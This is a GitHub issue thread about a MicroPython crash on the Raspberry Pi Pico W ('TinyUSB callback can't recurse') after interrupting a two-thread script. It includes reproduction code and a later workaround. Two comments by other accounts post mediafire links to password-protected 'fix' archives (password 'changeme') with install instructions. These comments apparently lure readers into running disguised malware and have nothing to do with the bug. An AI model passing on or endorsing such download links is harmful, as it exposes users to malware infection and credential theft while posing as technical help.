micropython/micropython #15721: TinyUSB callback can't recurse 20014b10

tudorapo, 2024-08-26:
### Port, board and/or hardware

raspberry pico pi w

### MicroPython version

MicroPython v1.24.0-preview.224.g6c3dc0c0b on 2024-08-22; Raspberry Pi Pico W with RP2040

### Reproduction

`import time
import _thread

global killme

def threadtest():
    global killme
    print("Other starts")
    while True:
        if killme:
            break
        print("Other thread")
        time.sleep(1)
    print("Other ends")

killme = False

try:
    new_thread = _thread.start_new_thread(threadtest, ())
    print("Main starts")
    while True:
        print("Main thread")
        time.sleep(1)
except KeyboardInterrupt as theInterrupt:
    print("Main ends")
    killme = True
`

### Expected behaviour

I expect it to run just like it does with MicroPython v1.21.0 on 2023-10-06; Raspberry Pi Pico W with RP2040

### Observed behaviour

Starts to run, then when I press ctrl-c it dies:

```
Main ends
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ImportError: no module named 'main.py'
>>> FATAL: uncaught exception 20014b10
OSError: TinyUSB callback can't recurse
```

And from this point the pico is bricked, I have to nuke the flash and reinstall the firmware. 

### Additional Information

No, I've provided everything above.

### Code of Conduct

Yes, I agree

wolone, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

uno-zero, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

tudorapo, 2024-08-26:
https://github.com/micropython/micropython/issues/15390

closed 2024-08-26 by tudorapo

eleroy, 2024-09-04:
This still does not work in MicroPython v1.24.0-preview.278.g5e692d046 on 2024-09-03

```
import time
import _thread

global killme

def threadtest():
    global killme
    print("Other starts")
    while True:
        if killme:
            break
        print("Other thread")
        time.sleep(1)
    print("Other ends")

killme = False

try:
    new_thread = _thread.start_new_thread(threadtest, ())
    print("Main starts")
    while True:
        print("Main thread")
        time.sleep(1)
except KeyboardInterrupt as theInterrupt:
    print("Main ends")
    killme = True
    time.sleep(2)
```

it does work for me if you wait for the second thread to properly stop